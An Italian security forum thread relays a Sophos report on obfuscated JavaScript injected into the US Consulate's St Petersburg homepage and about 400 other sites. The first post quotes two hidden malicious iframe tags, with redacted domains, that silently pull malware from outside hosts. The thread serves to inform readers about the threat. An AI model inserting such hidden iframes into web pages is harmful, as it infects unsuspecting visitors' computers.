|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#1 |
|
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
Un grande pesce preso nella rete - ancora Gromozon
Alcuni giorni fa SophosLabs ha individuato un javascript offuscato (Mal/ObfJS-C) nella homepage del Consolato degli Stati Uniti in Russia.
Analizzando il codice sorgente si può notare los cript offuscato e criptato: ![]() lo script tenta di scrivere nella pagina un iframe che prova a far scaricare silenziosamente ulteriore codice maligno nel pc della vittima: Codice:
<iframe name='6326fcf2ca' src='http://[removed].com/xxxx/index.php' width=10 height=12 style='display:none'></iframe> Ad interrogare gli archivi della settimana scorsa sono emerse ben 400 pagine con la stessa infezione: ![]() 1. Sulla sinistra sono rappresentati un grande gruppo di nodi e ciasc'uno rappresenta un sito web compromesso. Il nodo evidenziato in giallo è quello del Consolato americano in st Petersburg. 2. I nodi confluiscono presso due nodi che fanno da vettore per scaricare il materiale infettivo. 3. Ogni vettore fa installare un trojan. La pagina del Consolato Americano fa connettere ad entrambi i nodi infettivi facendo sì che si scarichino entrambi i trojan e ch nella pagina risulti un ulteriore iframe malevolo: Codice:
<iframe src='http://[removed].info/info/' width='1' height='1' style='visibility: hidden;'></iframe> L'attacco non era rivolto verso il Consolato in se ma ha seguito sempre lasolita tecnica con la quale questa banda opera che è simile al "pescare a strascico". Fonte: sophos.com
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
|
|
|
|
|
#2 |
|
Senior Member
Iscritto dal: Mar 2006
Messaggi: 22121
|
mi chiedo quando saranno fermati!
|
|
|
|
|
|
#3 |
|
Senior Member
Iscritto dal: Jan 2005
Messaggi: 7200
|
Subito dopo aver letto il titolo "Un grande pesce preso nella rete", ho chiamato il super-eroe che debellerà il male rappresentato da Gromozon:
![]() Si salvi chi può. ![]() Regards |
|
|
|
|
|
#4 |
|
Senior Member
Iscritto dal: Apr 2007
Messaggi: 2306
|
|
|
|
|
|
|
#5 |
|
Senior Member
Iscritto dal: Mar 2006
Messaggi: 22121
|
finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum
![]() ovviamente si scherza! |
|
|
|
|
|
#6 |
|
Senior Member
Iscritto dal: Aug 2006
Messaggi: 4350
|
|
|
|
|
|
|
#7 |
|
Senior Member
Iscritto dal: Mar 2006
Messaggi: 22121
|
|
|
|
|
|
|
#8 | |
|
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
e giusto poco fa' ecco che mi è successo:
Quote:
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
|
|
|
|
|
|
#9 | |
|
Senior Member
Iscritto dal: Feb 2007
Città: Salerno......
Messaggi: 3259
|
Quote:
__________________
Opera disabilitazione script ed iframe Recuperare le proprie password on line. Messenger: massima attenzione ai SITI TRUFFA | GUIDA:ShutdownTimer (Spegnimento auto pc) | Quando il centro sicurezza non riconosce i soft. Guida a Malwarebytes' Anti-Malware = tiemp bell e na volta...
|
|
|
|
|
|
|
#10 |
|
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
non vedo l'ora di vederli alla gogna sti ....
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 04:39.



















Recuperare le proprie password on line. Messenger: massima attenzione ai SITI TRUFFA | GUIDA:ShutdownTimer (Spegnimento auto pc) | Quando il centro sicurezza non riconosce i soft. Guida a Malwarebytes' Anti-Malware = tiemp bell e na volta...








